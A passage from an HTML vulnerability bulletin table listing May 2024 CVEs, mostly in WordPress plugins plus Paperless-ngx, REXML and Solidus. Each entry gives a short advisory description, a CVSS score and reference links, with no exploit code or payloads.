<td>Paperless-ngx is a document management system that transforms physical documents into a searchable online archive. Starting in version 2.5.0 and prior to version 2.8.6, remote user authentication allows API access even if API access is explicitly disabled. Version 2.8.6 contains a patchc for the issue.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35184&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35184" target="_blank">CVE-2024-35184</a><br><a href="https://github.com/paperless-ngx/paperless-ngx/commit/ed05b40ba461641b1b59b0a92f51f3f6a66ce180" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/paperless-ngx/paperless-ngx/pull/6739" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/paperless-ngx/paperless-ngx/releases/tag/v2.8.6" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/paperless-ngx/paperless-ngx/security/advisories/GHSA-72w4-hxqq-c256" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>phpbits--Forty Four 404 Plugin for WordPress<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in phpbits Forty Four - 404 Plugin for WordPress allows Stored XSS.This issue affects Forty Four - 404 Plugin for WordPress: from n/a through 1.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34423&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34423" target="_blank">CVE-2024-34423</a><br><a href="https://patchstack.com/database/vulnerability/forty-four/wordpress-forty-four-404-plugin-for-wordpress-plugin-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>piotnetdotcom--Piotnet Addons For Elementor<br> </td>
<td>The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.4.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4432&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4432" target="_blank">CVE-2024-4432</a><br><a href="https://plugins.trac.wordpress.org/browser/piotnet-addons-for-elementor/trunk/widgets/pafe-before-after-image-comparison-slider.php#L195" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/piotnet-addons-for-elementor/trunk/widgets/pafe-table.php#L195" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087322/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f65a7df-acb5-4b5b-8867-986ce9930e3f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>posimyththemes--The Plus Addons for Elementor Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce<br> </td>
<td>The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's element attributes in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-34373 is likely a duplicate of this issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0445&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0445" target="_blank">CVE-2024-0445</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_flip_box.php#L2323" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_info_box.php#L2928" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.3.4/modules/widgets/tp_pricing_table.php#L2942" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_flip_box.php#L2388" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_info_box.php#L2997" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_pricing_table.php#L2960" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a412e682-869a-46ba-a2d0-d84ed542adc9?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>posimyththemes--The Plus Addons for Elementor Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce<br> </td>
<td>The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Age Gate widget in all versions up to, and including, 5.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2785&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2785" target="_blank">CVE-2024-2785</a><br><a href="https://plugins.trac.wordpress.org/browser/the-plus-addons-for-elementor-page-builder/tags/5.5.0/modules/widgets/tp_age_gate.php?annotate=blame#L2389" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3076733%40the-plus-addons-for-elementor-page-builder&amp;new=3076733%40the-plus-addons-for-elementor-page-builder&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0117436-7a2a-42f3-8c05-75dfddfb9d09?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>prasunsen--Hostel<br> </td>
<td>The Hostel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5.3. This is due to missing or incorrect nonce validation when managing rooms. This makes it possible for unauthenticated attackers to create and delete rooms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4314&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4314" target="_blank">CVE-2024-4314</a><br><a href="https://plugins.trac.wordpress.org/changeset/3079755/hostel/trunk?contextall=1&amp;old=3070681&amp;old_path=%2Fhostel%2Ftrunk" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6a8c5d9b-4535-4edb-a92e-a9b83a0d22c3?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>pt-guy--Content Views Post Grid &amp; Filter, Recent Posts, Category Posts, &amp; More (Gutenberg Blocks and Shortcode)<br> </td>
<td>The Content Views - Post Grid &amp; Filter, Recent Posts, Category Posts, &amp; More (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'pagingType' parameter in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4446&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4446" target="_blank">CVE-2024-4446</a><br><a href="https://plugins.trac.wordpress.org/browser/content-views-query-and-display-post-page/tags/3.7.1/includes/html.php#L803" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/65504747-7f1b-43f9-be4d-48b9547e7c45?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>pure-chat--Pure Chat Live Chat Plugin &amp; More!<br> </td>
<td>The Pure Chat - Live Chat Plugin &amp; More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the purechatwid and purechatwname parameter in all versions up to, and including, 2.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3595&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3595" target="_blank">CVE-2024-3595</a><br><a href="https://wordpress.org/plugins/pure-chat/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d03c798-dc77-407c-8674-d0bd2f1ada8c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>rankmath--Rank Math SEO with AI Best SEO Tools<br> </td>
<td>The Rank Math SEO with AI Best SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'textAlign' parameter in versions up to, and including, 1.0.217 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4335&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4335" target="_blank">CVE-2024-4335</a><br><a href="https://plugins.trac.wordpress.org/browser/seo-by-rank-math/tags/1.0.217/includes/modules/schema/blocks/class-block.php#L64" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3080259/#file26" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/96eba67c-58e7-4eea-84d4-9b3bb275b42d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>rankmath--Rank Math SEO with AI Best SEO Tools<br> </td>
<td>The Rank Math SEO with AI Best SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in versions up to, and including, 1.0.218 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4617&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4617" target="_blank">CVE-2024-4617</a><br><a href="https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/modules/schema/blocks/class-block-faq.php#L183" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3084351/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/474fdbcb-fe3c-4a79-a847-363f81b300c2?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>realmag777--WordPress Meta Data and Taxonomies Filter (MDTF)<br> </td>
<td>Incorrect Authorization vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Inclusion, Functionality Misuse.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n/a through 1.3.3.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34434&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34434" target="_blank">CVE-2024-34434</a><br><a href="https://patchstack.com/database/vulnerability/wp-meta-data-filter-and-taxonomy-filter/wordpress-mdtf-meta-data-and-taxonomies-filter-plugin-1-3-3-2-arbitrary-shortcode-execution-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>redbitcz--SimpleShop<br> </td>
<td>The SimpleShop plugin for WordPress is vulnerable to unauthorized disconnection from SimpleShop due to a missing capability check on the maybe_disconnect_simpleshop function in all versions up to, and including, 2.10.2. This makes it possible for unauthenticated attackers to disconnect the SimpleShop.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1229&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1229" target="_blank">CVE-2024-1229</a><br><a href="https://plugins.trac.wordpress.org/browser/simpleshop-cz/trunk/src/Settings.php?rev=3019145#L341" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3080151%40simpleshop-cz&amp;new=3080151%40simpleshop-cz&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4dc39c47-3b99-4e43-b25d-a025f3d228b5?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>redbitcz--SimpleShop<br> </td>
<td>The SimpleShop plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.0. This is due to missing or incorrect nonce validation on the maybe_disconnect_simpleshop function. This makes it possible for unauthenticated attackers to disconnect the site from simpleshop via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1230&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1230" target="_blank">CVE-2024-1230</a><br><a href="https://github.com/redbitcz/simpleshop-wp-plugin/commit/8b04c95bb29036658e6a5b1ef735440646e3199b" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/simpleshop-cz/trunk/src/Settings.php?rev=3019145#L341" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9870db7f-0c8e-44a4-aa0f-13709d773756?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>reviewx--ReviewX Multi-criteria Rating &amp; Reviews for WooCommerce<br> </td>
<td>The ReviewX - Multi-criteria Rating &amp; Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized deletion of data due to a missing capability check on the reviewx_remove_guest_image function in all versions up to, and including, 1.6.27. This makes it possible for authenticated attackers, with subscriber access and above, to delete attachments.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3609&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3609" target="_blank">CVE-2024-3609</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3086273%40reviewx%2Ftrunk&amp;old=3054184%40reviewx%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f8152adf-1ca9-4a19-b539-39e257ab94c8?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>ruby--rexml<br> </td>
<td>REXML is an XML toolkit for Ruby. The REXML gem before 3.2.6 has a denial of service vulnerability when it parses an XML that has many `&lt;`s in an attribute value. Those who need to parse untrusted XMLs may be impacted to this vulnerability. The REXML gem 3.2.7 or later include the patch to fix this vulnerability. As a workaround, don't parse untrusted XMLs.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35176&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35176" target="_blank">CVE-2024-35176</a><br><a href="https://github.com/ruby/rexml/commit/4325835f92f3f142ebd91a3fdba4e1f1ab7f1cfb" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/ruby/rexml/security/advisories/GHSA-vg3r-rm7w-2xgh" target="_blank">security-advisories@github.com</a><br><a href="https://www.ruby-lang.org/en/news/2024/05/16/dos-rexml-cve-2024-35176" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>sbouey--Falang multilanguage for WordPress<br> </td>
<td>The Falang multilanguage for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.49 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4417&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4417" target="_blank">CVE-2024-4417</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3082466%40falang%2Ftrunk&amp;old=3059173%40falang%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b62949fd-d73f-4c42-82c7-c29986bca1da?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>sc0ttkclark--Pods Custom Content Types and Fields<br> </td>
<td>The Pods - Custom Content Types and Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pod Form widget in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3956&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3956" target="_blank">CVE-2024-3956</a><br><a href="https://plugins.trac.wordpress.org/browser/pods/tags/3.2.1/ui/front/form.php#L105" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083418/pods/tags/3.1.4.1/includes/data.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083418/pods/tags/3.1.4.1/ui/front/form.php" target="_blank">security@wordfence.com</a><br><a href="https://pods.io/2024/05/08/pods-3-2-1-1-security-release/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0707c92-96e9-444a-8a13-52d49c9e3f5c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>shaonsina--Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets &amp; Elementor Templates)<br> </td>
<td>The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets &amp; Elementor Templates) plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via several parameters in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4333&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4333" target="_blank">CVE-2024-4333</a><br><a href="https://plugins.trac.wordpress.org/browser/sina-extension-for-elementor/trunk/assets/js/jquery.countdown.min.js" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/sina-extension-for-elementor/trunk/assets/js/typed.min.js" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3085825/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f616df94-7839-49db-baa5-88f8f1de208f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>shaonsina--Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets &amp; Elementor Templates)<br> </td>
<td>The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets &amp; Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sina Particle Layer widget in all versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4373&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4373" target="_blank">CVE-2024-4373</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3085825%40sina-extension-for-elementor&amp;new=3085825%40sina-extension-for-elementor&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eee04b1d-188a-4b92-a6f3-dfa843ca20d7?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>smartersite--WP Compress Image Optimizer [All-In-One]<br> </td>
<td>The WP Compress - Image Optimizer [All-In-One] plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the several functions in versions up to, and including, 6.20.01. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to edit plugin settings, including storing cross-site scripting, in multisite environments.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4445&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4445" target="_blank">CVE-2024-4445</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-compress-image-optimizer/trunk/classes/mu.class.php?rev=2946135" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082085/#file655" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/830f53a4-da3b-4a95-99f1-c4a4c8e6944c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>smartersite--WP Compress Image Optimizer [All-In-One]<br> </td>
<td>The WP Compress - Image Optimizer [All-In-One plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 6.20.01. This is due to insufficient validation on the redirect url supplied via the 'css' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6812&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6812" target="_blank">CVE-2023-6812</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082085/wp-compress-image-optimizer/trunk/fixCss.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cbbf9fbb-74fd-42eb-a781-2a720fe56b13?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>smartypants--SP Project &amp; Document Manager<br> </td>
<td>The SP Project &amp; Document Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cdm_save_category AJAX action in all versions up to, and including, 4.70. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary folder name that do not belong to them.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1693&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1693" target="_blank">CVE-2024-1693</a><br><a href="https://plugins.trac.wordpress.org/browser/sp-client-document-manager/trunk/classes/ajax.php#L786" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1951ad6c-17b5-44ae-85e2-376b99df742e?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>solidus--solidus<br> </td>
<td>Solidus &lt;= 4.3.4 is affected by a Stored Cross-Site Scripting vulnerability in the order tracking URL.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4859&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4859" target="_blank">CVE-2024-4859</a><br><a href="https://www.tenable.com/security/research/tra-2024-15" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>squelch--Squelch Tabs and Accordions Shortcodes<br> </td>
<td>The Squelch Tabs and Accordions Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.4.7. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4463&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4463" target="_blank">CVE-2024-4463</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3082482%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&amp;old=3067680%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9490f2-ad52-477e-ae3b-be49984e8189?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>stacklok--minder<br> </td>
